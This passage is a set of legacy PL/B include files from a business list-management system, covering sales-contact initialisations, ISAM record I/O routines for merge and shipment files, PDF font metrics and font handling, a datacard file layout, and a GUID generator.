OCNT3 INIT "<NAME>(415) 291-5656"
.OCNT4 INIT "<NAME>"
.OCNT4 INIT "<NAME>"
.OCNT4 INIT "<NAME>" 1/8/92
.OCNT4 INIT "stacey white" 3/2/93
OCNT4 INIT "<NAME>(415) 291-5644"
.OCNT4 INIT "<NAME>" 5/93
OCNT5 INIT "<NAME>(415) 291-5669"
.OCNT5 INIT "<NAME>(415) 291-5669"
.OCNT5 INIT "jennifer post"
.OCNT5 INIT "<NAME>"
.OCNT5 INIT "<NAME>"
.OCNT5 INIT "derek glass"
.OCNT6 INIT "<NAME>"
.OCNT6 INIT "<NAME>"
OCNT6 INIT "<NAME>(415) 291-5668"
.OCNT6 INIT "<NAME>(415) 291-5668" 11/10/97
.OCNT7 INIT "<NAME>"
.OCNT7 INIT "<NAME>(415) 291-5667" 12/98
.OCNT7 INIT "<NAME>(415) 291-5667" 01/10/2000
OCNT7 INIT "<NAME> (415) 291-5621"
.OCNT8 INIT "<NAME>"
.OCNT8 INIT "<NAME>"
.OCNT8 INIT "<NAME>"
.OCNT8 INIT "<NAME>(415) 291-5655" 4/1/98
.OCNT8 INIT "<NAME>(415) 291-5609"
OCNT8 INIT "<NAME>(415) 291-5609"
.OCNT9 INIT "elizabeth corsale"
OCNT9 INIT "Phoe<NAME>(415) 291-5667"
.OCNT9 INIT "<NAME>(415) 291-5638" 5/1/98
OCNT10 INIT "<NAME>(415) 291-5640"
.OCNT11 INIT "<NAME>"
.OCNT11 INIT "<NAME>"
.OCNT11 INIT "<NAME>" .4/28/94
.OCNT11 INIT "<NAME>" .7/19/94
.OCNT11 INIT "<NAME>(415) 291-5640"
.OCNT11 INIT "<NAME>(415) 291-5603"
OCNT11 INIT "<NAME>(415) 291-5647"
.OCNT12 INIT "<NAME>" cold calls
OCNT12 INIT "<NAME>(415) 291-5643"
.OCNT13 INIT "<NAME>"
.OCNT13 INIT "<NAME>"
.OCNT13 INIT "<NAME>" left sales 7/93.
.OCNT13 INIT "<NAME>"
.OCNT13 INIT "<NAME>(415) 291-5657" 5/31/98
OCNT13 INIT "<NAME>(415) 291-5657" 08/04/98
.OCNT14 INIT "<NAME>"
OCNT14 INIT "<NAME>(415) 291-5642"
.OCNT15 INIT "<NAME>"
OCNT15 INIT "<NAME>(415) 291-5663"
.OCNT15 INIT "<NAME>"
OCNT16 INIT "<NAME>(415) 291-5662"
OCNT17 INIT "<NAME>(415) 291-5658"
...............................................................................
.PROGRAMS ACCESSING THIS INCLUDE:
.
. NAME ACCESS TYPE
.*********** ********************************************
.NORD0001
.NORD002L
.NORD0009
.NORD0033
.NINV0001
.NINV0003
.NXCH0001
.********> END IF INCLUDE
<file_sep>/include/NMRGIO.INC
..............................................................................
.
. NMRGIO INCLUSION
. NIN MERGE FILE I/O ROUTINES
.
. FILE NAME : NINMERGE
. REC LENGTH: 277 COMPRESSED
. INDEX KEY : (1) 1-6 (LR#)
.DLH 08Feb2007 file server and filelist
..............................................................................
.
. ENTRY POINT : NMRGKEY
. REQUIRED : 'NMRGPATH', 'NMRGFLD'
. RETURNED : MERGE RECPRD
. DESCRIPTION : EXACT ISAM KEY READ
.
NMRGKEY BRANCH NMRGFLAG TO NMRG1
CALL NMRGOPEN
NMRG1 FILEPI 1;NMRGFILE
READ NMRGFILE,NMRGFLD;NMRGVAR
RETURN
..............................................................................
.
. ENTRY POINT : NMRGTST
. REQUIRED : NMRGFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
NMRGTST BRANCH NMRGFLAG TO NMRG2
CALL NMRGOPEN
NMRG2 FILEPI 1;NMRGFILE
READ NMRGFILE,NMRGFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NMRGKS
. REQUIRED : 'NMRGPATH'
. RETURNED : MERGE RENMRG
. DESCRIPTION : KEY SEQUENTIAL MERGE FILE READ
.
NMRGKS BRANCH NMRGFLAG TO NMRG3
CALL NMRGOPEN
NMRG3 FILEPI 1;NMRGFILE
READKS NMRGFILE;NMRGVAR
RETURN
..............................................................................
.
. ENTRY POINT : NMRGSEQ
. REQUIRED :
. RETURNED : MERGE RECORD
. DESCRIPTION : SEQUENTIAL MERGE FILE READ
.
NMRGSEQ BRANCH NMRGFLAG TO NMRG4
CALL NMRGOPEN
NMRG4 FILEPI 1;NMRGFILE
READ NMRGFILE,SEQ;NMRGVAR
RETURN
..............................................................................
.
. ENTRY POINT : NMRGWRT
. REQUIRED : 'NMRGFLD', 'NMRGPATH=1'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT., ISI 2/3 INSERTS.
.
NMRGWRT BRANCH NMRGFLAG TO NMRG5
CALL NMRGOPEN
NMRG5 FILEPI 1;NMRGFILE
WRITE NMRGFILE,NMRGFLD;NMRGVAR
RETURN
.
..............................................................................
.
. ENTRY POINT : NMRGUPD
. REQUIRED : Previous Valid Read
. RETURNED :
. DESCRIPTION : Update record
.
NMRGUPD BRANCH NMRGFLAG TO NMRG6
CALL NMRGOPEN
NMRG6 FILEPI 1;NMRGFILE
Update NMRGFILE;NMRGVAR
RETURN
.
..............................................................................
.
. ENTRY POINT : NMRGDEL
. REQUIRED : 'NMRGPATH', NMRGDEL
. RETURNED :
. DESCRIPTION : Deletes record and KEy
.
NMRGDEL BRANCH NMRGFLAG TO NMRG7
.
CALL NMRGOPEN
NMRG7 FILEPI 1;NMRGFILE
DELETE NMRGFILE,NMrgfld
RETURN
.
...............................................................................
.
. ENTRY POINT : NMRGOPEN
. REQUIRED : 'NMRGPATH'
. RETURNED : 'NMRGFLAG' SET TO THE PATH NUMBER: 'NMRGPATH', IF OPENNED.
. DESCRIPTION : OPEN NIN MERGE FILE, DEPENDENT ON PATH NUMBER.
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NMRGOPEN
TRAP NMRGGONE IF IO
OPEN NMRGFILE,NMRGNAME
TRAPCLR IO
MOVE C1 TO NMRGFLAG
RETURN
NMRGGONE MOVE NMRGNAME TO FILENAME
CALL FILEGONE
.
...............................................................................
<file_sep>/DEVELOP/Includes - why/pdffmetrics.inc
. basic 14 font metrics data
.
pdffonts dim 21(14),("Times-Roman"),("Times-Bold"),("Times-Italic"),("Times-BoldItalic"):
("Helvetica"),("Helvetica-Bold"),("Helvetica-Oblique"),("Helvetica-BoldOblique"):
("Courier"),("Courier-Bold"),("Courier-Oblique"),("Courier-BoldOblique"):
("Symbol"),("ZapfDingbats")
fontIdx form 2
.
pdffontres form 4(14)
pdffontobj form 4(14)
.
fonts DIM ^2000 // just enough room for all 14 fonts...
CurrentFont dim 14 // page content tag
CurFontRes dim 20 // page dictionary resource
fontsize form 2
fontnum form 2
.
FontMetrics RECORD
ulPos form 4.3 // underline pos in char metric
ulpen form 3.3 // underline pen size
Descender form 4.3
GlyphWidths form 5.3(256)
recordend
.
TimesMetric INIT "-100,50,-217,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,333,408,500,500,833,778,333,333,333,500,564,250,333,250,278,500,500,500,":
"500,500,500,500,500,500,500,278,278,564,564,564,444,921,722,667,667,722,611,":
"556,722,722,333,389,722,611,889,722,722,556,722,667,556,611,722,722,944,722,":
"722,611,333,278,333,469,500,333,444,500,444,500,444,333,500,500,278,278,500,":
"278,778,500,500,500,500,333,389,278,500,500,722,500,500,444,480,200,480,541,":
"333,500,500,167,500,500,500,500,180,444,500,333,333,556,556,500,500,500,250,":
"453,350,333,444,444,500,1000,1000,444,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,889,276,611,722,889,310,667,278,278,500,722,500,0,0,0,0"
TimesBMetric init "-100,50,-217,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,333,555,500,500,1000,833,333,333,333,500,570,250,333,250,278,500,500,500,":
"500,500,500,500,500,500,500,333,333,570,570,570,500,930,722,667,722,722,667,":
"611,778,778,389,500,778,667,944,722,778,611,778,722,556,667,722,722,1000,722,":
"722,667,333,278,333,581,500,333,500,556,444,556,444,333,500,556,278,333,556,":
"278,833,556,500,556,556,444,389,333,556,500,722,500,500,444,394,220,394,520,":
"333,500,500,167,500,500,500,500,278,500,500,333,333,556,556,500,500,500,250,":
"540,350,333,500,500,500,1000,1000,500,333,333,333,333,333,333,333,333,333,333,":
"333,333,333,1000,1000,300,667,778,1000,330,722,278,278,500,722,556,0,0,0,0"
TimesIMetric INIT "-100,50,-217,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,333,420,500,500,833,778,333,333,333,500,675,250,333,250,278,500,500,500,":
"500,500,500,500,500,500,500,333,333,675,675,675,500,920,611,611,667,722,611,":
"611,722,722,333,444,667,556,833,667,722,611,722,611,500,556,722,611,833,611,":
"556,556,389,278,389,422,500,333,500,500,444,500,444,278,500,500,278,278,444,":
"278,722,500,500,500,500,389,389,278,500,444,667,444,444,389,400,275,400,541,":
"389,500,500,167,500,500,500,500,214,556,500,333,333,500,500,500,500,500,250,":
"523,350,333,556,556,500,889,1000,500,333,333,333,333,333,333,333,333,333,333,":
"333,333,333,889,889,276,556,722,944,310,667,278,278,500,667,500,0,0,0,0"
TimesBIMetric init "-100,50,-217,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,389,555,500,500,833,778,333,333,333,500,570,250,333,250,278,500,500,500,":
"500,500,500,500,500,500,500,333,333,570,570,570,500,832,667,667,667,722,667,":
"667,722,778,389,500,667,611,889,722,722,611,722,667,556,611,722,667,889,667,":
"611,611,333,278,333,570,500,333,500,500,444,500,444,333,500,556,278,278,500,":
"278,778,556,500,500,500,389,389,278,556,444,667,500,444,389,348,220,348,570,":
"389,500,500,167,500,500,500,500,278,500,500,333,333,556,556,500,500,500,250,":
"500,350,333,500,500,500,1000,1000,500,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,944,266,611,722,944,300,722,278,278,500,722,500,0,0,0,0"
HelveticaMetric init "-100,50,-207,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,278,355,556,556,889,667,222,333,333,389,584,278,333,278,278,556,556,556,":
"556,556,556,556,556,556,556,278,278,584,584,584,556,1015,667,667,722,722,":
"667,611,778,722,278,500,667,556,833,722,778,667,778,722,667,611,722,667,944,":
"667,667,611,278,278,278,469,556,222,556,556,500,556,556,278,556,556,222,222,":
"500,222,833,556,556,556,556,333,500,278,556,500,722,500,500,500,334,260,334,":
"584,333,556,556,167,556,556,556,556,191,333,556,333,333,500,500,556,556,556,":
"278,537,350,222,333,333,556,1000,1000,611,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,1000,370,556,778,1000,365,889,278,222,611,944,611,0,0,0,0"
HelveticaBMetric init "-100,50,-207,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,333,474,556,556,889,722,278,333,333,389,584,278,333,278,278,556,556,556,":
"556,556,556,556,556,556,556,333,333,584,584,584,611,975,722,722,722,722,667,":
"611,778,722,278,556,722,611,833,722,778,667,778,722,667,611,722,667,944,667,":
"667,611,333,278,333,584,556,278,556,611,556,611,556,333,611,611,278,278,556,":
"278,889,611,611,611,611,389,556,333,611,556,778,556,556,500,389,280,389,584,":
"333,556,556,167,556,556,556,556,238,500,556,333,333,611,611,556,556,556,278,":
"556,350,278,500,500,556,1000,1000,611,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,1000,370,611,778,1000,365,889,278,278,611,944,611,0,0,0,0"
HelveticaIMetric init "-100,50,-207,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,278,355,556,556,889,667,222,333,333,389,584,278,333,278,278,556,556,556,":
"556,556,556,556,556,556,556,278,278,584,584,584,556,1015,667,667,722,722,667,":
"611,778,722,278,500,667,556,833,722,778,667,778,722,667,611,722,667,944,667,":
"667,611,278,278,278,469,556,222,556,556,500,556,556,278,556,556,222,222,500,":
"222,833,556,556,556,556,333,500,278,556,500,722,500,500,500,334,260,334,584,":
"333,556,556,167,556,556,556,556,191,333,556,333,333,500,500,556,556,556,278,":
"537,350,222,333,333,556,1000,1000,611,333,333,333,333,333,333,333,333,333,333,":
"333,333,333,1000,1000,370,556,778,1000,365,889,278,222,611,944,611,0,0,0,0"
HelveticaBIMetric init "-100,50,-207,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,333,474,556,556,889,722,278,333,333,389,584,278,333,278,278,556,556,556,":
"556,556,556,556,556,556,556,333,333,584,584,584,611,975,722,722,722,722,667,":
"611,778,722,278,556,722,611,833,722,778,667,778,722,667,611,722,667,944,667,":
"667,611,333,278,333,584,556,278,556,611,556,611,556,333,611,611,278,278,556,":
"278,889,611,611,611,611,389,556,333,611,556,778,556,556,500,389,280,389,584,":
"333,556,556,167,556,556,556,556,238,500,556,333,333,611,611,556,556,556,278,":
"556,350,278,500,500,556,1000,1000,611,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,1000,370,611,778,1000,365,889,278,278,611,944,611,0,0,0,0"
CourierMetric init "-100,50,-157,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,0,0,0,0"
SymbolMetric INIT "-100,50,-293,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,333,713,500,549,833,778,439,333,333,500,549,250,549,250,278,500,500,500,":
"500,500,500,500,500,500,500,278,278,549,549,549,444,549,722,667,722,612,611,":
"763,603,722,333,631,722,686,889,722,722,768,741,556,592,611,690,439,768,645,":
"795,611,333,863,333,658,500,500,631,549,549,494,439,521,411,603,329,603,549,":
"549,576,521,549,549,521,549,603,439,576,713,686,493,686,494,480,200,480,549,":
"750,620,247,549,167,713,500,753,753,753,753,1042,987,603,987,603,400,549,411,":
"549,549,713,494,460,549,549,549,549,1000,603,1000,658,823,686,795,987,768,768,":
"823,768,768,713,713,713,713,713,713,713,768,713,790,790,890,823,549,250,713,":
"603,603,1042,987,603,987,603,494,329,790,790,786,713,384,384,384,384,384,384,":
"494,494,494,494,329,274,686,686,686,384,384,384,384,384,384,494,494,494,0"
ZapfDingbatsMetric init "-100,50,-143,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,974,961,974,980,719,789,790,791,690,960,939,549,855,911,933,911,945,974,":
"755,846,762,761,571,677,763,760,759,754,494,552,537,577,692,786,788,788,790,":
"793,794,816,823,789,841,823,833,816,831,923,744,723,749,790,792,695,776,768,":
"792,759,707,708,682,701,826,815,789,789,707,687,696,689,786,787,713,791,785,":
"791,873,761,762,762,759,759,892,892,788,784,438,138,277,415,392,392,668,668,":
"390,390,317,317,276,276,509,509,410,410,234,234,334,334,732,544,544,910,667,":
"760,760,776,595,694,626,788,788,788,788,788,788,788,788,788,788,788,788,788,":
"788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,":
"788,788,788,788,788,788,788,788,894,838,1016,458,748,924,748,918,927,928,928,":
"834,873,828,924,924,917,930,931,463,883,836,836,867,867,696,696,874,874,760,":
"946,771,865,771,888,967,888,831,873,927,970,918,0"
.
MetricsA dim ^(14),(TimesMetric),(TimesBMetric),(TimesIMetric),(TimesBIMetric):
(HelveticaMetric),(HelveticaBMetric),(HelveticaIMetric),(HelveticaBIMetric):
(CourierMetric),(CourierMetric),(CourierMetric),(CourierMetric): // fixed font just re-use the same array
(SymbolMetric),(ZapfDingbatsMetric)
.
.
LastFntIdx form 2
.
PDFFont FUNCTION
FontName dim 80
ENTRY
PDFFontName dim 80
char2 dim 2
attributes record
attrib1 dim 2
attrib2 dim 2
attrib3 dim 2
recordend
pdffontoffset form 1
content DIM 150
.
CLEAR fontsize,fontidx,usingttf
EXPLODE FontName,"(",PDFFontName // to-do... check for valid font
.
IF not zero
EXPLODE FontName,",)",attributes
TYPE attributes.attrib1
IF EQUAL
MOVE attributes.attrib1,fontsize
ENDIF
TYPE attributes.attrib2
IF EQUAL
MOVE attributes.attrib2,fontsize
ENDIF
TYPE attributes.attrib3
IF EQUAL
MOVE attributes.attrib3,fontsize
ENDIF
IF (attributes.attrib1 = "B" or attributes.attrib2 = "B" or attributes.attrib3 = "B")
ADD "1",pdffontoffset // italic = pdffont array +1
ENDIF
IF (attributes.attrib1 = "I" or attributes.attrib2 = "I" or attributes.attrib3 = "I")
ADD "2",pdffontoffset // italic = pdffont array +2
ENDIF
ENDIF
.
IF (Fontsize=0)
MOVE "12",fontsize // default
ENDIF
.
SEARCH PDFFontName,pdffonts(1),"14",fontIdx
IF (fontIdx = 0)
MOVE "9",fontIdx //Courier(12) is default
CLEAR FontName
ENDIF
.
IF (FontIdx != 1 and FontIdx != 5 and FontIdx != 9)
CLEAR pdffontoffset // bold and italic only apply to 1 5 or 9
ELSE
ADD pdffontoffset,fontIdx
ENDIF
.
IF (pdffontres(fontidx)=0)
.
EXPLODE MetricsA(fontIdx),",",FontMetrics
.
INCR ObjNum
INCR fontnum
MOVE fontnum,pdffontres(fontidx)
MOVE ObjNum,pdffontobj(fontidx)
.
SQUEEZE fontnum,char2
SQUEEZE objNum,scratch
PACK content,scratch," 0 obj",CRLF:
" << /Type /Font",CRLF:
" /Subtype /Type1",CRLF:
" /Name /F",char2,CRLF:
" /BaseFont /",pdffonts(fontIdx),CRLF:
" >>",CRLF:
"endobj",CRLF,CRLF
APPEND content,fonts
ELSE
SQUEEZE pdfFontRes(fontidx),char2
IF (fontidx != LastFntIdx)
EXPLODE MetricsA(fontIdx),",",FontMetrics
ENDIF
MOVE fontidx,LastFntIdx
ENDIF
.
PACK CurrentFont,"/F",char2," ",fontsize," Tf"
.
RESET page(curpage).fontres
SQUEEZE pdffontobj(fontidx),scratch
PACK CurFontRes,"/F",char2," ",scratch," 0 R "
SCAN CurFontRes,page(curpage).fontres
IF NOT EQUAL
ENDSET page(curpage).fontres
APPEND CurFontRes,page(curpage).fontres
ENDIF
.
FUNCTIONEND
.
PDFBoldOn FUNCTION
entry
boldfont dim 30
.
SELECT from fontIdx // check if already bold
WHEN "2" or "4" or "6" or "8" or "10" or "12"
RETURN
ENDSELECT
INCR fontIdx
PACK boldfont,pdffonts(fontIdx),"(",fontsize,")"
call PDFFont using boldfont
FUNCTIONEND
PDFBoldOff FUNCTION
entry
boldfont dim 30
.
SELECT from fontIdx // check if bold already off
WHEN "1" or "3" or "5" or "7" or "9" or "11"
RETURN
ENDSELECT
DECR fontIdx
PACK boldfont,pdffonts(fontIdx),"(",fontsize,")"
call PDFFont using boldfont
FUNCTIONEND
.
PDFUnderLineOn FUNCTION
entry
SET ul
FUNCTIONEND
.
PDFUnderLineOff FUNCTION
entry
CLEAR ul
FUNCTIONEND
...........................................
.Text Metrics ... Get character widths
. metrics in AFM files ( and pdf font widths array ) are in glyph space
. glyph space is 1/1000th text space
. using default settings, text space is 72DPI
.
. I have not implamented anything to change default units
.
. character output width = glyph width * font size / 1000
.
LoadFontMetricsFF LFUNCTION //From File
FontName DIM 40
ENTRY
afmname dim 250
afmfile file
data dim 100
CharMetrics record
char dim 7
width dim 12
name dim 40
box dim 25
recordend
startcharmetrics form 1
unit dim 2
chvalue form 3
wdtype dim 4
wdvalue form 5
.
CLEAR FontMetrics.GlyphWidths // discard old data
PACK afmname,FontName,".afm"
OPEN afmfile,afmname,read
LOOP
READ afmfile,seq;data
UNTIL OVER
.
MATCH "UnderlinePosition ",data
IF EQUAL
BUMP data,18
CHOP data
MOVE data,FontMetrics.ulpos
ENDIF
.
MATCH "UnderlineThickness ",data
IF EQUAL
BUMP data,19
CHOP data
MOVE data,FontMetrics.ulpen
ENDIF
.
MATCH "Descender ",data // how far below baseline does the
IF EQUAL // font go? needed for underline pos
BUMP data,10
chop data
move data,FontMetrics.Descender
ENDIF
.
MATCH "StartCharMetrics ",data
IF EQUAL
SET startcharmetrics
CONTINUE
ENDIF
CONTINUE IF (startcharmetrics=0)
. glyph value
EXPLODE data,";",CharMetrics
PARSE CharMetrics.char,unit,"AZ" // C = decimal CH = hex
PARSENUM CharMetrics.char,chvalue // character value ( parsenum handles hex :D )
.
. not supporting named characters at this time
.
BREAK if (chvalue = seq) // -1 is named character instead of value
. char width
PARSE CharMetrics.width,wdtype,"AZ" // width type ( WX is what we want)
PARSENUM CharMetrics.width,wdvalue // width value
.
MATCH "WX ",wdtype
IF NOT EQUAL
MATCH "W1X ",wdtype
ENDIF
IF EQUAL
MOVE wdvalue,FontMetrics.GlyphWidths(chvalue)
ENDIF
.
REPEAT
CLOSE afmfile
.
FUNCTIONEND
.
PDFMeasureString FUNCTION
string dim ^
entry
char dim 1
cval integer 1
strlen form 5.3
fptr form 10
MOVEFPTR string,fptr
LOOP
REMOVE string,char
UNTIL EOS
MOVE char,cval
ADD (FontMetrics.GlyphWidths(cval)*fontsize/1000),strlen
REPEAT
RESET string,fptr
FUNCTIONEND USING strlen
<file_sep>/include/MDC035DD.inc
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_M035
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
M035NAME Init "MDC_035.Isi|NINS1:502"
M035FLIST FileList
M035FILE IFILE Name="MDC_035.Isi|NINS1:502"
M035FILE2 IFILE Name="MDC_0352.Isi|NINS1:502"
FileListEnd
M035SFILE FILE
.M035SFILE FILE Name="MDC_035.csv"
M035FLAG FORM 1
M035PATH FORM 1
M035Fld Dim 6
M035Fld2 Dim 8
.
M035VARS LIST .for ease I am using Min's names
CADCNO Dim 6 1-6 Card#
CASQNO Form 2 7-8 Category Seq#
CATC Dim 3 9-11 Category COde
CAT$ FOrm 5.2 12-19 Category DOllar
CATCHR dim 4 20-23 Category option -char
CATR Dim 1 24-24 Rate M/L
CATDSC Dim 25 29-49 Description
ListEnd
M035VARS1 LIST .for ease I am using Min's names
CCADCNO Dim 6 1-6 Card#
CCASQNO Dim 2 7-8 Category Seq#
CCATC Dim 3 9-11 Category COde
CCAT$ Dim 7 12-19 Category DOllar
CCATCHR dim 4 20-23 Category option -char
CCATR Dim 1 24-24 Rate M/L
CCATDSC Dim 25 29-49 Description
ListEnd
<file_sep>/include/Nshpio.inc
; Last change: ML 12 Oct 1998 7:52 am
..............................................................................
.
. NSHPIO INCLUSION
. NIN SHIPMENT FILE I/O ROUTINES
.
. REVISED 24JUL91 TO USE CA'S VARIABLES.
.
. FILE NAME : NINSHP
. REC LENGTH: 77 FIXED
. INDEX KEY : 1-6 (LR NUMBER)
.
.added
. 07Oct98 DLH shpvars, Tracking number
. 15Jul98 DLH add option file lock, record lock, no lock
..............................................................................
.
. ENTRY POINT : NSHPKEY
. REQUIRED : 'NSHPFLD'
. RETURNED : SHIPPING RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
NSHPKEY BRANCH NSHPFLAG TO NSHP1
CALL NSHPOPEN
NSHP1 branch nshplock to nshp1l,nshp1r,nshp1n
.with file locks
NSHP1L FILEPI 1;NSHPFILE
READ NSHPFILE,NSHPFLD;shpvars
RETURN
.with record locks . note file open must have had flag set
NSHP1R
READLK NSHPFILE,NSHPFLD;shpvars
RETURN
.no locks
NSHP1N
READ NSHPFILE,NSHPFLD;shpvars
RETURN
..............................................................................
.
. ENTRY POINT : NSHPTST
. REQUIRED : 'NSHPFLD'
. RETURNED :
. DESCRIPTION : ISAM KEY TEST READ
.
NSHPTST BRANCH NSHPFLAG TO NSHP2
CALL NSHPOPEN
NSHP2 branch nshplock to nshp2l,nshp2r,nshp2n
NSHP2L FILEPI 1;NSHPFILE
READ NSHPFILE,NSHPFLD;STR1
RETURN
NSHP2R
READLK NSHPFILE,NSHPFLD;STR1
RETURN
NSHP2N
READ NSHPFILE,NSHPFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NSHPKS
. REQUIRED :
. RETURNED : SHIPPING RECORD
. DESCRIPTION : KEY SEQUENTIAL SHIPPING FILE READ
.
NSHPKS BRANCH NSHPFLAG TO NSHP3
CALL NSHPOPEN
NSHP3 branch nshplock to nshp3l,nshp3r,nshp3n
NSHP3L FILEPI 1;NSHPFILE
READKS NSHPFILE;SHPVARS
RETURN
NSHP3R
READKSLK NSHPFILE;SHPVARS
RETURN
NSHP3N
READKS NSHPFILE;SHPVARS
RETURN
..............................................................................
.
. ENTRY POINT : NSHPSEQ
. REQUIRED :
. RETURNED : SHIPPING RECORD
. DESCRIPTION : SEQUENTIAL SHIPPING FILE READ
.
NSHPSEQ BRANCH NSHPFLAG TO NSHP4
CALL NSHPOPEN
NSHP4 branch nshplock to nshp4l,nshp4r,nshp4n
NSHP4L FILEPI 1;NSHPFILE
READ NSHPFILE,SEQ;SHPVARS
RETURN
NSHP4R
READLK NSHPFILE,SEQ;SHPVARS
RETURN
NSHP4N
READ NSHPFILE,SEQ;SHPVARS
RETURN
..............................................................................
.
. ENTRY POINT : NSHPWRT
. REQUIRED : 'NSHPFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NSHPWRT BRANCH NSHPFLAG TO NSHP5
CALL NSHPOPEN
NSHP5 branch nshplock to nshp5l,nshp5r
NSHP5L FILEPI 1;NSHPFILE
WRITE NSHPFILE,NSHPFLD;SHPVARS
RETURN
NSHP5R
WRITE NSHPFILE,NSHPFLD;SHPVARS
RETURN
..............................................................................
.
. ENTRY POINT : NSHPUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE LIST FILE
.
NSHPUPD BRANCH NSHPFLAG TO NSHP6
CALL NSHPOPEN
NSHP6 branch nshplock to nshp6l,nshp6r
NSHP6L FILEPI 1;NSHPFILE
UPDATE NSHPFILE;SHPVARS
RETURN
NSHP6R
UPDATE NSHPFILE;SHPVARS
RETURN
..............................................................................
.
. ENTRY POINT : NSHPDEL
. REQUIRED : 'NSHPFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NSHPDEL BRANCH NSHPFLAG TO NSHP7
CALL NSHPOPEN
NSHP7 FILEPI 1;NSHPFILE
DELETE NSHPFILE,NSHPFLD
RETURN
...............................................................................
.
. ENTRY POINT : NSHPOPEN
. REQUIRED : 'NSHPFLAG'
. RETURNED : 'NSHPFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN SHIPPING FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NSHPOPEN TRAP NSHPGONE IF IO
BRANCH NshpLOCK TO NshpOPENl,NSHPOPENr
NSHPOPENl OPEN NSHPFILE,NSHPNAME
TRAPCLR IO
MOVE C1 TO NSHPFLAG
RETURN
NSHPOPENR OPEN NSHPFILE,NSHPNAME,LOCKMANUAL,SINGLE
TRAPCLR IO
MOVE C1 TO NSHPFLAG
RETURN
NSHPGONE MOVE NSHPNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/ListMarketsProject/Notes/guidgen.inc
//////////////////////////////////////////////////////////////////////////////
//
// PROGRAM: guidGen.inc
//
// AUTHOR: <NAME> (<EMAIL>)
//
// DATE: 03 NOV 2004
//
// PURPOSE: generates a random GUID for use as an ISAM key
//
// REVISION: 03 NOV 2004 VER01 MLYONS Created
//
//////////////////////////////////////////////////////////////////////////////
#iwk1 integer 01
#hiByte integer 01
#loByte integer 01
#result integer 04
#cwk1 dim 01
#rawResult dim 16
#ASCIIresult dim 32
#GUID dim ^
#hexData dim 01(0..15),("0"):
("1"):
("2"):
("3"):
("4"):
("5"):
("6"):
("7"):
("8"):
("9"):
("A"):
("B"):
("C"):
("D"):
("E"):
("F")
CoCreateGuid profile ole32:
CoCreateGuid:
int4:
dim
//////////////////////////////////////////////////////////////////////////////
goto #end
//////////////////////////////////////////////////////////////////////////////
generateGUID routine #GUID
winapi CoCreateGuid giving #result using #rawResult
clear #ASCIIresult
loop
move #rawResult to #cwk1
move #cwk1 to #iwk1
divide "16" into #iwk1 giving #hiByte
calc #loByte = (#iwk1 - (#hiByte * 16))
append #hexData(#hiByte) to #ASCIIresult
append #hexData(#loByte) to #ASCIIresult
bump #rawResult
repeat until eos
reset #ASCIIresult
move "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" to #GUID
